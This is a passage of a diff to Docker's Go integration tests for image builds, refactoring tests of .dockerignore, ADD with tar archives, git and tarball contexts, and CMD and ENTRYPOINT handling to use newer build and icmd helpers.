-		"dir1/dir2/file2": "", // remains
-
-		"dir1/dir2/file4": "",
-		"dir1/dir2/file5": "",
-		"dir1/dir2/file6": "",
-		"dir1/dir3/file7": "",
-		"dir1/dir3/file8": "",
-		"dir1/dir4/file9": "",
-
-		"dir1/dir5/fileAA": "",
-		"dir1/dir5/fileAB": "",
-		"dir1/dir5/fileB":  "",
-
-		".dockerignore": `
+	dockerignore := `
 **/file0
 **/*file1
 **/dir1/file2
@@ -3527,52 +2599,56 @@ dir1/dir3/**
 **/file?A
 **/file\?B
 **/dir5/file.
-`,
-	})
-	c.Assert(err, check.IsNil)
-	defer ctx.Close()
+`
 
-	_, err = buildImageFromContext("noname", ctx, true)
-	c.Assert(err, check.IsNil)
+	buildImageSuccessfully(c, "noname", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", dockerfile),
+		build.WithFile(".dockerignore", dockerignore),
+		build.WithFile("dir1/file0", ""),
+		build.WithFile("dir1/dir2/file0", ""),
+		build.WithFile("file1", ""),
+		build.WithFile("dir1/file1", ""),
+		build.WithFile("dir1/dir2/file1", ""),
+		build.WithFile("dir1/file2", ""),
+		build.WithFile("dir1/dir2/file2", ""), // remains
+		build.WithFile("dir1/dir2/file4", ""),
+		build.WithFile("dir1/dir2/file5", ""),
+		build.WithFile("dir1/dir2/file6", ""),
+		build.WithFile("dir1/dir3/file7", ""),
+		build.WithFile("dir1/dir3/file8", ""),
+		build.WithFile("dir1/dir4/file9", ""),
+		build.WithFile("dir1/dir5/fileAA", ""),
+		build.WithFile("dir1/dir5/fileAB", ""),
+		build.WithFile("dir1/dir5/fileB", ""),
+	))
 }
 
 func (s *DockerSuite) TestBuildLineBreak(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildlinebreak"
-	_, err := buildImage(name,
-		`FROM  busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM  busybox
 RUN    sh -c 'echo root:testpass \
 	> /tmp/passwd'
 RUN    mkdir -p /var/run/sshd
 RUN    sh -c "[ "$(cat /tmp/passwd)" = "root:testpass" ]"
-RUN    sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+RUN    sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`))
 }
 
 func (s *DockerSuite) TestBuildEOLInLine(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildeolinline"
-	_, err := buildImage(name,
-		`FROM   busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM   busybox
 RUN    sh -c 'echo root:testpass > /tmp/passwd'
 RUN    echo "foo \n bar"; echo "baz"
 RUN    mkdir -p /var/run/sshd
 RUN    sh -c "[ "$(cat /tmp/passwd)" = "root:testpass" ]"
-RUN    sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+RUN    sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`))
 }
 
 func (s *DockerSuite) TestBuildCommentsShebangs(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildcomments"
-	_, err := buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 # This is an ordinary comment.
 RUN { echo '#!/bin/sh'; echo 'echo hello world'; } > /hello.sh
 RUN [ ! -x /hello.sh ]
@@ -3580,18 +2656,13 @@ RUN [ ! -x /hello.sh ]
 RUN chmod +x /hello.sh
 RUN [ -x /hello.sh ]
 RUN [ "$(cat /hello.sh)" = $'#!/bin/sh\necho hello world' ]
-RUN [ "$(/hello.sh)" = "hello world" ]`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+RUN [ "$(/hello.sh)" = "hello world" ]`))
 }
 
 func (s *DockerSuite) TestBuildUsersAndGroups(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildusers"
-	_, err := buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 
 # Make sure our defaults work
 RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)" = '0:0/root:root' ]
@@ -3640,13 +2711,10 @@ RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/do
 
 # make sure unknown uid/gid still works properly
 USER 1042:1043
-RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1042:1043/1042:1043/1043:1043' ]`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1042:1043/1042:1043/1043:1043' ]`))
 }
 
+// FIXME(vdemeester) rename this test (and probably "merge" it with the one below TestBuildEnvUsage2)
 func (s *DockerSuite) TestBuildEnvUsage(c *check.C) {
 	// /docker/world/hello is not owned by the correct user
 	testRequires(c, NotUserNamespace)
@@ -3663,7 +2731,7 @@ ENV    BAZ $BAR
 ENV    FOOPATH $PATH:$FOO
 RUN    [ "$BAR" = "$BAZ" ]
 RUN    [ "$FOOPATH" = "$PATH:/foo/baz" ]
-ENV	   FROM hello/docker/world
+ENV    FROM hello/docker/world
 ENV    TO /docker/world/hello
 ADD    $FROM $TO
 RUN    [ "$(cat $TO)" = "hello" ]
@@ -3671,20 +2739,13 @@ ENV    abc=def
 ENV    ghi=$abc
 RUN    [ "$ghi" = "def" ]
 `
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"hello/docker/world": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	_, err = buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", dockerfile),
+		build.WithFile("hello/docker/world", "hello"),
+	))
 }
 
+// FIXME(vdemeester) rename this test (and probably "merge" it with the one above TestBuildEnvUsage)
 func (s *DockerSuite) TestBuildEnvUsage2(c *check.C) {
 	// /docker/world/hello is not owned by the correct user
 	testRequires(c, NotUserNamespace)
@@ -3748,18 +2809,10 @@ ENV    eee4 'foo'
 RUN    [ "$eee1,$eee2,$eee3,$eee4" = 'foo,foo,foo,foo' ]
 
 `
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"hello/docker/world": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	_, err = buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", dockerfile),
+		build.WithFile("hello/docker/world", "hello"),
+	))
 }
 
 func (s *DockerSuite) TestBuildAddScript(c *check.C) {
@@ -3771,18 +2824,11 @@ ADD test /test
 RUN ["chmod","+x","/test"]
 RUN ["/test"]
 RUN [ "$(cat /testfile)" = 'test!' ]`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"test": "#!/bin/sh\necho 'test!' > /testfile",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
 
-	_, err = buildImageFromContext(name, ctx, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", dockerfile),
+		build.WithFile("test", "#!/bin/sh\necho 'test!' > /testfile"),
+	))
 }
 
 func (s *DockerSuite) TestBuildAddTar(c *check.C) {
@@ -3790,7 +2836,7 @@ func (s *DockerSuite) TestBuildAddTar(c *check.C) {
 	testRequires(c, NotUserNamespace)
 	name := "testbuildaddtar"
 
-	ctx := func() *FakeContext {
+	ctx := func() *fakecontext.Fake {
 		dockerfile := `
 FROM busybox
 ADD test.tar /
@@ -3832,20 +2878,17 @@ RUN cat /existing-directory-trailing-slash/test/foo | grep Hi`
 		if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil {
 			c.Fatalf("failed to open destination dockerfile: %v", err)
 		}
-		return fakeContextFromDir(tmpDir)
+		return fakecontext.New(c, tmpDir)
 	}()
 	defer ctx.Close()
 
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatalf("build failed to complete for TestBuildAddTar: %v", err)
-	}
-
+	buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
 }
 
 func (s *DockerSuite) TestBuildAddBrokenTar(c *check.C) {
 	name := "testbuildaddbrokentar"
 
-	ctx := func() *FakeContext {
+	ctx := func() *fakecontext.Fake {
 		dockerfile := `
 FROM busybox
 ADD test.tar /`
@@ -3884,33 +2927,26 @@ ADD test.tar /`
 		if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil {
 			c.Fatalf("failed to open destination dockerfile: %v", err)
 		}
-		return fakeContextFromDir(tmpDir)
+		return fakecontext.New(c, tmpDir)
 	}()
 	defer ctx.Close()
 
-	if _, err := buildImageFromContext(name, ctx, true); err == nil {
-		c.Fatalf("build should have failed for TestBuildAddBrokenTar")
-	}
+	buildImage(name, build.WithExternalBuildContext(ctx)).Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
 }
 
 func (s *DockerSuite) TestBuildAddNonTar(c *check.C) {
 	name := "testbuildaddnontar"
 
 	// Should not try to extract test.tar
-	ctx, err := fakeContext(`
+	buildImageSuccessfully(c, name, build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `
 		FROM busybox
 		ADD test.tar /
-		RUN test -f /test.tar`,
-		map[string]string{"test.tar": "not_a_tar_file"})
-
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatalf("build failed for TestBuildAddNonTar")
-	}
+		RUN test -f /test.tar`),
+		build.WithFile("test.tar", "not_a_tar_file"),
+	))
 }
 
 func (s *DockerSuite) TestBuildAddTarXz(c *check.C) {
@@ -3919,7 +2955,7 @@ func (s *DockerSuite) TestBuildAddTarXz(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildaddtarxz"
 
-	ctx := func() *FakeContext {
+	ctx := func() *fakecontext.Fake {
 		dockerfile := `
 			FROM busybox
 			ADD test.tar.xz /
@@ -3947,32 +2983,26 @@ func (s *DockerSuite) TestBuildAddTarXz(c *check.C) {
 			c.Fatalf("failed to close tar archive: %v", err)
 		}
 
-		xzCompressCmd := exec.Command("xz", "-k", "test.tar")
-		xzCompressCmd.Dir = tmpDir
-		out, _, err := runCommandWithOutput(xzCompressCmd)
-		if err != nil {
-			c.Fatal(err, out)
-		}
-
+		icmd.RunCmd(icmd.Cmd{
+			Command: []string{"xz", "-k", "test.tar"},
+			Dir:     tmpDir,
+		}).Assert(c, icmd.Success)
 		if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil {
 			c.Fatalf("failed to open destination dockerfile: %v", err)
 		}
-		return fakeContextFromDir(tmpDir)
+		return fakecontext.New(c, tmpDir)
 	}()
 
 	defer ctx.Close()
 
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatalf("build failed to complete for TestBuildAddTarXz: %v", err)
-	}
-
+	buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
 }
 
 func (s *DockerSuite) TestBuildAddTarXzGz(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildaddtarxzgz"
 
-	ctx := func() *FakeContext {
+	ctx := func() *fakecontext.Fake {
 		dockerfile := `
 			FROM busybox
 			ADD test.tar.xz.gz /
@@ -4000,52 +3030,40 @@ func (s *DockerSuite) TestBuildAddTarXzGz(c *check.C) {
 			c.Fatalf("failed to close tar archive: %v", err)
 		}
 
-		xzCompressCmd := exec.Command("xz", "-k", "test.tar")
-		xzCompressCmd.Dir = tmpDir
-		out, _, err := runCommandWithOutput(xzCompressCmd)
-		if err != nil {
-			c.Fatal(err, out)
-		}
-
-		gzipCompressCmd := exec.Command("gzip", "test.tar.xz")
-		gzipCompressCmd.Dir = tmpDir
-		out, _, err = runCommandWithOutput(gzipCompressCmd)
-		if err != nil {
-			c.Fatal(err, out)
-		}
+		icmd.RunCmd(icmd.Cmd{
+			Command: []string{"xz", "-k", "test.tar"},
+			Dir:     tmpDir,
+		}).Assert(c, icmd.Success)
 
+		icmd.RunCmd(icmd.Cmd{
+			Command: []string{"gzip", "test.tar.xz"},
+			Dir:     tmpDir,
+		})
 		if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil {
 			c.Fatalf("failed to open destination dockerfile: %v", err)
 		}
-		return fakeContextFromDir(tmpDir)
+		return fakecontext.New(c, tmpDir)
 	}()
 
 	defer ctx.Close()
 
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatalf("build failed to complete for TestBuildAddTarXz: %v", err)
-	}
-
+	buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
 }
 
+// FIXME(vdemeester) most of the from git tests could be moved to `docker/cli` e2e tests
 func (s *DockerSuite) TestBuildFromGit(c *check.C) {
 	name := "testbuildfromgit"
-	git, err := newFakeGit("repo", map[string]string{
+	git := fakegit.New(c, "repo", map[string]string{
 		"Dockerfile": `FROM busybox
-					ADD first /first
-					RUN [ -f /first ]
-					MAINTAINER docker`,
+		ADD first /first
+		RUN [ -f /first ]
+		MAINTAINER docker`,
 		"first": "test git data",
 	}, true)
-	if err != nil {
-		c.Fatal(err)
-	}
 	defer git.Close()
 
-	_, err = buildImageFromPath(name, git.RepoURL, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithContextPath(git.RepoURL))
+
 	res := inspectField(c, name, "Author")
 	if res != "docker" {
 		c.Fatalf("Maintainer should be docker, got %s", res)
@@ -4054,48 +3072,34 @@ func (s *DockerSuite) TestBuildFromGit(c *check.C) {
 
 func (s *DockerSuite) TestBuildFromGitWithContext(c *check.C) {
 	name := "testbuildfromgit"
-	git, err := newFakeGit("repo", map[string]string{
+	git := fakegit.New(c, "repo", map[string]string{
 		"docker/Dockerfile": `FROM busybox
 					ADD first /first
 					RUN [ -f /first ]
 					MAINTAINER docker`,
 		"docker/first": "test git data",
 	}, true)
-	if err != nil {
-		c.Fatal(err)
-	}
 	defer git.Close()
 
-	u := fmt.Sprintf("%s#master:docker", git.RepoURL)
-	_, err = buildImageFromPath(name, u, true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithContextPath(fmt.Sprintf("%s#master:docker", git.RepoURL)))
+
 	res := inspectField(c, name, "Author")
 	if res != "docker" {
 		c.Fatalf("Maintainer should be docker, got %s", res)
 	}
 }
 
-func (s *DockerSuite) TestBuildFromGitwithF(c *check.C) {
+func (s *DockerSuite) TestBuildFromGitWithF(c *check.C) {
 	name := "testbuildfromgitwithf"
-	git, err := newFakeGit("repo", map[string]string{
+	git := fakegit.New(c, "repo", map[string]string{
 		"myApp/myDockerfile": `FROM busybox
 					RUN echo hi from Dockerfile`,
 	}, true)
-	if err != nil {
-		c.Fatal(err)
-	}
 	defer git.Close()
 
-	out, _, err := dockerCmdWithError("build", "-t", name, "--no-cache", "-f", "myApp/myDockerfile", git.RepoURL)
-	if err != nil {
-		c.Fatalf("Error on build. Out: %s\nErr: %v", out, err)
-	}
-
-	if !strings.Contains(out, "hi from Dockerfile") {
-		c.Fatalf("Missing expected output, got:\n%s", out)
-	}
+	buildImage(name, cli.WithFlags("-f", "myApp/myDockerfile"), build.WithContextPath(git.RepoURL)).Assert(c, icmd.Expected{
+		Out: "hi from Dockerfile",
+	})
 }
 
 func (s *DockerSuite) TestBuildFromRemoteTarball(c *check.C) {
@@ -4120,18 +3124,14 @@ func (s *DockerSuite) TestBuildFromRemoteTarball(c *check.C) {
 		c.Fatalf("failed to close tar archive: %v", err)
 	}
 
-	server, err := fakeBinaryStorage(map[string]*bytes.Buffer{
+	server := fakestorage.New(c, "", fakecontext.WithBinaryFiles(map[string]*bytes.Buffer{
 		"testT.tar": buffer,
-	})
-	c.Assert(err, check.IsNil)
-
+	}))
 	defer server.Close()
 
-	_, err = buildImageFromPath(name, server.URL()+"/testT.tar", true)
-	c.Assert(err, check.IsNil)
+	cli.BuildCmd(c, name, build.WithContextPath(server.URL()+"/testT.tar"))
 
 	res := inspectField(c, name, "Author")
-
 	if res != "docker" {
 		c.Fatalf("Maintainer should be docker, got %s", res)
 	}
@@ -4139,24 +3139,17 @@ func (s *DockerSuite) TestBuildFromRemoteTarball(c *check.C) {
 
 func (s *DockerSuite) TestBuildCleanupCmdOnEntrypoint(c *check.C) {
 	name := "testbuildcmdcleanuponentrypoint"
-	if _, err := buildImage(name,
-		`FROM `+minimalBaseImage()+`
-        CMD ["test"]
-		ENTRYPOINT ["echo"]`,
-		true); err != nil {
-		c.Fatal(err)
-	}
-	if _, err := buildImage(name,
-		fmt.Sprintf(`FROM %s
-		ENTRYPOINT ["cat"]`, name),
-		true); err != nil {
-		c.Fatal(err)
-	}
+
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+`
+		CMD ["test"]
+		ENTRYPOINT ["echo"]`))
+	buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`FROM %s
+		ENTRYPOINT ["cat"]`, name)))
+
 	res := inspectField(c, name, "Config.Cmd")
 	if res != "[]" {
 		c.Fatalf("Cmd %s, expected nil", res)
 	}
-
 	res = inspectField(c, name, "Config.Entrypoint")
 	if expected := "[cat]"; res != expected {
 		c.Fatalf("Entrypoint %s, expected %s", res, expected)
@@ -4165,14 +3158,10 @@ func (s *DockerSuite) TestBuildCleanupCmdOnEntrypoint(c *check.C) {
 
 func (s *DockerSuite) TestBuildClearCmd(c *check.C) {
 	name := "testbuildclearcmd"
-	_, err := buildImage(name,
-		`From `+minimalBaseImage()+`
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+`
    ENTRYPOINT ["/bin/bash"]
-   CMD []`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+   CMD []`))
+
 	res := inspectFieldJSON(c, name, "Config.Cmd")
 	if res != "[]" {
 		c.Fatalf("Cmd %s, expected %s", res, "[]")
@@ -4184,9 +3173,8 @@ func (s *DockerSuite) TestBuildEmptyCmd(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 
 	name := "testbuildemptycmd"
-	if _, err := buildImage(name, "FROM "+minimalBaseImage()+"\nMAINTAINER quux\n", true); err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile("FROM "+minimalBaseImage()+"\nMAINTAINER quux\n"))
+
 	res := inspectFieldJSON(c, name, "Config.Cmd")
 	if res != "null" {
 		c.Fatalf("Cmd %s, expected %s", res, "null")
@@ -4195,43 +3183,31 @@ func (s *DockerSuite) TestBuildEmptyCmd(c *check.C) {
 
 func (s *DockerSuite) TestBuildOnBuildOutput(c *check.C) {
 	name := "testbuildonbuildparent"
-	if _, err := buildImage(name, "FROM busybox\nONBUILD RUN echo foo\n", true); err != nil {
-		c.Fatal(err)
-	}
-
-	_, out, err := buildImageWithOut(name, "FROM "+name+"\nMAINTAINER quux\n", true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nONBUILD RUN echo foo\n"))
 
-	if !strings.Contains(out, "# Executing 1 build trigger") {
-		c.Fatal("failed to find the build trigger output", out)
-	}
+	buildImage(name, build.WithDockerfile("FROM "+name+"\nMAINTAINER quux\n")).Assert(c, icmd.Expected{
+		Out: "# Executing 1 build trigger",
+	})
 }
 
+// FIXME(vdemeester) should be a unit test
 func (s *DockerSuite) TestBuildInvalidTag(c *check.C) {
-	name := "abcd:" + stringutils.GenerateRandomAlphaOnlyString(200)
-	_, out, err := buildImageWithOut(name, "FROM "+minimalBaseImage()+"\nMAINTAINER quux\n", true)
-	// if the error doesn't check for illegal tag name, or the image is built
-	// then this should fail
-	if !strings.Contains(out, "Error parsing reference") || strings.Contains(out, "Sending build context to Docker daemon") {
-		c.Fatalf("failed to stop before building. Error: %s, Output: %s", err, out)
-	}
+	name := "abcd:" + testutil.GenerateRandomAlphaOnlyString(200)
+	buildImage(name, build.WithDockerfile("FROM "+minimalBaseImage()+"\nMAINTAINER quux\n")).Assert(c, icmd.Expected{
+		ExitCode: 125,
+		Err:      "invalid reference format",
+	})
 }
 
 func (s *DockerSuite) TestBuildCmdShDashC(c *check.C) {
 	name := "testbuildcmdshc"
-	if _, err := buildImage(name, "FROM busybox\nCMD echo cmd\n", true); err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nCMD echo cmd\n"))
 
 	res := inspectFieldJSON(c, name, "Config.Cmd")
-
 	expected := `["/bin/sh","-c","echo cmd"]`
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		expected = `["cmd","/S","/C","echo cmd"]`
 	}
-
 	if res != expected {
 		c.Fatalf("Expected value %s not in Config.Cmd: %s", expected, res)
 	}
@@ -4243,124 +3219,86 @@ func (s *DockerSuite) TestBuildCmdSpaces(c *check.C) {
 	// the arg separator to make sure ["echo","hi"] and ["echo hi"] don't
 	// look the same
 	name := "testbuildcmdspaces"
-	var id1 string
-	var id2 string
-	var err error
 
-	if id1, err = buildImage(name, "FROM busybox\nCMD [\"echo hi\"]\n", true); err != nil {
-		c.Fatal(err)
-	}
-
-	if id2, err = buildImage(name, "FROM busybox\nCMD [\"echo\", \"hi\"]\n", true); err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nCMD [\"echo hi\"]\n"))
+	id1 := getIDByName(c, name)
+	buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nCMD [\"echo\", \"hi\"]\n"))
+	id2 := getIDByName(c, name)
 
 	if id1 == id2 {
 		c.Fatal("Should not have resulted in the same CMD")
 	}
 
 	// Now do the same with ENTRYPOINT
-	if id1, err = buildImage(name, "FROM busybox\nENTRYPOINT [\"echo hi\"]\n", true); err != nil {
-		c.Fatal(err)
-	}
-
-	if id2, err = buildImage(name, "FROM busybox\nENTRYPOINT [\"echo\", \"hi\"]\n", true); err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENTRYPOINT [\"echo hi\"]\n"))
+	id1 = getIDByName(c, name)
+	buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENTRYPOINT [\"echo\", \"hi\"]\n"))
+	id2 = getIDByName(c, name)
 
 	if id1 == id2 {
 		c.Fatal("Should not have resulted in the same ENTRYPOINT")
 	}
-
 }
 
 func (s *DockerSuite) TestBuildCmdJSONNoShDashC(c *check.C) {
 	name := "testbuildcmdjson"
-	if _, err := buildImage(name, "FROM busybox\nCMD [\"echo\", \"cmd\"]", true); err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nCMD [\"echo\", \"cmd\"]"))
 
 	res := inspectFieldJSON(c, name, "Config.Cmd")
-
 	expected := `["echo","cmd"]`
-
 	if res != expected {
 		c.Fatalf("Expected value %s not in Config.Cmd: %s", expected, res)
 	}
-
 }
 
-func (s *DockerSuite) TestBuildEntrypointInheritance(c *check.C) {
-
-	if _, err := buildImage("parent", `
+func (s *DockerSuite) TestBuildEntrypointCanBeOverriddenByChild(c *check.C) {
+	buildImageSuccessfully(c, "parent", build.WithDockerfile(`
     FROM busybox
     ENTRYPOINT exit 130
-    `, true); err != nil {
-		c.Fatal(err)
-	}
+    `))
 
-	if _, status, _ := dockerCmdWithError("run", "parent"); status != 130 {
-		c.Fatalf("expected exit code 130 but received %d", status)
-	}
+	icmd.RunCommand(dockerBinary, "run", "parent").Assert(c, icmd.Expected{
+		ExitCode: 130,
+	})
 
-	if _, err := buildImage("child", `
+	buildImageSuccessfully(c, "child", build.WithDockerfile(`
     FROM parent
     ENTRYPOINT exit 5
-    `, true); err != nil {
-		c.Fatal(err)
-	}
-
-	if _, status, _ := dockerCmdWithError("run", "child"); status != 5 {
-		c.Fatalf("expected exit code 5 but received %d", status)
-	}
+    `))
 
+	icmd.RunCommand(dockerBinary, "run", "child").Assert(c, icmd.Expected{
+		ExitCode: 5,
+	})
 }
 
-func (s *DockerSuite) TestBuildEntrypointInheritanceInspect(c *check.C) {
+func (s *DockerSuite) TestBuildEntrypointCanBeOverriddenByChildInspect(c *check.C) {
 	var (
 		name     = "testbuildepinherit"
 		name2    = "testbuildepinherit2"
 		expected = `["/bin/sh","-c","echo quux"]`
 	)
 
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		expected = `["cmd","/S","/C","echo quux"]`
 	}
 
-	if _, err := buildImage(name, "FROM busybox\nENTRYPOINT /foo/bar", true); err != nil {
-		c.Fatal(err)
-	}
-
-	if _, err := buildImage(name2, fmt.Sprintf("FROM %s\nENTRYPOINT echo quux", name), true); err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENTRYPOINT /foo/bar"))
+	buildImageSuccessfully(c, name2, build.WithDockerfile(fmt.Sprintf("FROM %s\nENTRYPOINT echo quux", name)))
 
 	res := inspectFieldJSON(c, name2, "Config.Entrypoint")
-
 	if res != expected {
 		c.Fatalf("Expected value %s not in Config.Entrypoint: %s", expected, res)
 	}
 
-	out, _ := dockerCmd(c, "run", name2)
-
-	expected = "quux"
-
-	if strings.TrimSpace(out) != expected {
-		c.Fatalf("Expected output is %s, got %s", expected, out)
-	}
-
+	icmd.RunCommand(dockerBinary, "run", name2).Assert(c, icmd.Expected{
+		Out: "quux",
+	})
 }
 
 func (s *DockerSuite) TestBuildRunShEntrypoint(c *check.C) {
 	name := "testbuildentrypoint"
-	_, err := buildImage(name,
-		`FROM busybox
-                                ENTRYPOINT echo`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
+                                ENTRYPOINT echo`))
 	dockerCmd(c, "run", "--rm", name)
 }
 
@@ -4368,7 +3306,7 @@ func (s *DockerSuite) TestBuildExoticShellInterpolation(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuildexoticshellinterpolation"
 
-	_, err := buildImage(name, `
+	buildImageSuccessfully(c, name, build.WithDockerfile(`
 		FROM busybox
 
 		ENV SOME_VAR a.b.c
@@ -4386,11 +3324,7 @@ func (s *DockerSuite) TestBuildExoticShellInterpolation(c *check.C) {
 		RUN [ "${SOME_VAR:+Version: ${SOME_VAR}}" = 'Version: a.b.c' ]
 		RUN [ "${SOME_UNSET_VAR:+${SOME_VAR}}" = '' ]
 		RUN [ "${SOME_UNSET_VAR:-${SOME_VAR:-d.e.f}}" = 'a.b.c' ]
-	`, false)
-	if err != nil {
-		c.Fatal(err)
-	}
-
+	`))
 }
 
 func (s *DockerSuite) TestBuildVerifySingleQuoteFails(c *check.C) {
@@ -4400,53 +3334,40 @@ func (s *DockerSuite) TestBuildVerifySingleQuoteFails(c *check.C) {
 	// as a "string" instead of "JSON array" and pass it on to "sh -c" and
 	// it should barf on it.
 	name := "testbuildsinglequotefails"
-
-	if _, err := buildImage(name,
-		`FROM busybox
-		CMD [ '/bin/sh', '-c', 'echo hi' ]`,
-		true); err != nil {
-		c.Fatal(err)
+	expectedExitCode := 2
+	if testEnv.OSType == "windows" {
+		expectedExitCode = 127
 	}
 
-	if _, _, err := dockerCmdWithError("run", "--rm", name); err == nil {
-		c.Fatal("The image was not supposed to be able to run")
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
+		CMD [ '/bin/sh', '-c', 'echo hi' ]`))
 
+	icmd.RunCommand(dockerBinary, "run", "--rm", name).Assert(c, icmd.Expected{
+		ExitCode: expectedExitCode,
+	})
 }
 
 func (s *DockerSuite) TestBuildVerboseOut(c *check.C) {
 	name := "testbuildverboseout"
 	expected := "\n123\n"
 
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		expected = "\n123\r\n"
 	}
 
-	_, out, err := buildImageWithOut(name,
-		`FROM busybox
-RUN echo 123`,
-		false)
-
-	if err != nil {
-		c.Fatal(err)
-	}
-	if !strings.Contains(out, expected) {
-		c.Fatalf("Output should contain %q: %q", "123", out)
-	}
-
+	buildImage(name, build.WithDockerfile(`FROM busybox
+RUN echo 123`)).Assert(c, icmd.Expected{
+		Out: expected,
+	})
 }
 
 func (s *DockerSuite) TestBuildWithTabs(c *check.C) {
 	name := "testbuildwithtabs"
-	_, err := buildImage(name,
-		"FROM busybox\nRUN echo\tone\t\ttwo", true)
-	if err != nil {
-		c.Fatal(err)
-	}
+	buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nRUN echo\tone\t\ttwo"))
 	res := inspectFieldJSON(c, name, "ContainerConfig.Cmd")
 	expected1 := `["/bin/sh","-c","echo\tone\t\ttwo"]`
 	expected2 := `["/bin/sh","-c","echo\u0009one\u0009\u0009two"]` // syntactically equivalent, and what Go 1.3 generates
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		expected1 = `["cmd","/S","/C","echo\tone\t\ttwo"]`
 		expected2 = `["cmd","/S","/C","echo\u0009one\u0009\u0009two"]` // syntactically equivalent, and what Go 1.3 generates
 	}
@@ -4458,14 +3379,9 @@ func (s *DockerSuite) TestBuildWithTabs(c *check.C) {
 func (s *DockerSuite) TestBuildLabels(c *check.C) {
 	name := "testbuildlabel"
